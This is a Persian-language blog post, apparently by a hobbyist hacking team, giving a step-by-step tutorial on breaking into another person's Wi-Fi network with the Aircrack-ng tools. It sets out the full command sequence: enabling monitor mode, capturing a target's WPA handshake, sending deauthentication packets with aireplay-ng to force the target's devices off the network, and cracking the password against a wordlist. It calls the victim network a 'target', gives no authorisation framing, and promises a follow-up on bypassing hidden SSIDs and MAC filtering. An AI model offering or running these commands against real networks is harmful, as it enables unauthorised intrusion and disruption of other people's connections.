نفوذ به شبکه وایرلس با لینوکس 😊

Mestercomuter Mestercomuter Mestercomuter · 1402/1/13 01:56 · خواندن 3 دقیقه

به نام خدا:. سلام اینبار یکم پامو فراتر از گلیمم گذاشتم بلکه یه محکی بزنم ببینم اوضاع از چه قراره و لینوکس رو بالا بکشم. امیدوارم پشیمون نشم از اینکارم و نرم و دیگه قید اینکارم رو نزنم!!! اول لازم میدونم یه توضیح مختصری راجب شبکه وایرلس بدم و راجب امنیت اون بحث کنم. بعد از اون، راه های نفوذ و دور زدن اونارو هم به ترتیب مورد بررسی قرار میدیم.

اکثرا میدونیم برای برقرار کردن امنیت شبکه وایرلسمون باید یسری نکات امنیتی رو رعایت کنیم. اول انتخاب پروتکل امنیتی WPA2 برای شبکه مون و یه پسورد و هیدن کردن SSID و فعال کردن MAC filtering برای جلوگیری از ورود غیرمجاز یه دیواس ناشناس به داخل شبکه و... خب میتونم بگم همه این کار ها قابل احترامه ولی خب هکر جماعت احترام حالیش نی و مسیر های مختلفی رو طی میکنه تا همه این مکانیزم های امنیتی رو دور بزنه. بله ما هم قراره دقیقا همه این مسیر ها رو بریم و همشون رو بررسی کنیم. بر خلاف تصور یه عده نفوذ به شبکه وایرلس یا همون وایفای به قول دوستان برای استفاده از اینترنت طرف نیست. بلکه میشه به دیوایس های موجود در شبکه نفوذ کرد و خیلی کارای جذاب دیگه... خب همونطور که میدونید ما توو شبکه وایرلس 3 نوع پروتکل امنیتی داریم

WEP
WPA
WPA2

که پروتکل WPA2 امنیت بیشتری نسب به پروتکل های امنیتی دیگه داره، برای همین معمولا از همین پروتکل امنیتی استفاده میکنن.

خب میخوایم از یه ابزار توپی استفاده کنیم که مخصوص همین کار خودمونه.

به اسم: Aircrack-ng

 

خوب دوستان همینطور که قبلاً گفتم مبلغ پرداختی جهت حمایت 

از تیم ایران هکی هستش که تو روبیکا هم به ادرس

 

 تیم ایران هکی 

فعالیت میکنیم و منم سر نوشتن این پست انگشت شصتم 

به چوخ رفت 😂 پس ناخون خشک بازی در نیارید 

کل مبلغ ۲۰۰۰ تمن هستش 😊 که همه بتونن استفاده کنن 

 

به مناسبت یک سالگی وبلاگ رایگان شد 

 

دوستانی که مبلغ رو پرداخت کردید مقدمه رو که ایشالا خوندید ⁦:-)⁩

 

خب سریع بریم سر اصل مطلب: برای استارت دستورات زیر رو به ترتیب وارد کنید:

airmon-ng
airmon-ng check kill
airmon-ng start (Interface. EX: wlan0)
airodump-ng (Interface-Mode. EX: wlan0mon)

خب ما تونستیم شبکه های اطراف رو اسکن کنیم. به این روش اصطلاحا میگن هندشیک.

خب بعد از اسکن بگردین دنبال تارگتتون و دستور زیر رو وارد کنین:

airodump-ng --bssid (BSSID) -c (Channel#) -w (Handshake) (Interface-Mode)

 

 

 

 

 

bssid : مک آدرس تارگت

  c : چنل شبکه تارگت

w : ایجاد فایل هدنشیک

خب یه نکته بهتون بگم که دو نکته بی ارزه. وقتی دستور بالا رو وارد کردین توو مرحله اسکن، فورا یه ترمینال جدید باز کنین تا

 به سمت تارگت نویز ارسال کنیم تا شبکه ش رو قطع و وصل کنیم :)

aireplay-ng -0 5 -a (BSSID) -c (STATION) (Interface-Mode)

 

 

بسیارعالی. فقط مونده مرحله آخر که باید فایل هندشیک .cap رو ترتیبش رو بدیم. دستور زیر رو وارد کنید:

aircrack-ng  -a(1=WEP ، 2=WPA) -b (BSSID) -w (Passlist).txt (Handshake).cap

a : نوع پروتکل

b : مک آدرس تارگت

w : پسورد لیست

 

 

 

 

خب اوکیه، بعد از کرک پسورد کار تمومه...

ولی... همچنان این داستان ادامه دارد...

آنچه در قسمت بعد خواهید دید: دور زدن مکانیزم های امنیتی SSID مخفی و دور زدن MAC Address Filtering و...

بله کار هنوز ادامه داره، ما توو قسمت بعدی به این میپردازیم که اگه تارگت حرفه ای بود و مثلا امنیتش رو برد بالا با این مکانیزم ها، همه شون رو دور بزنیم و پرچممون رو توو قله های دیوایس هاش برافراشته کنیم.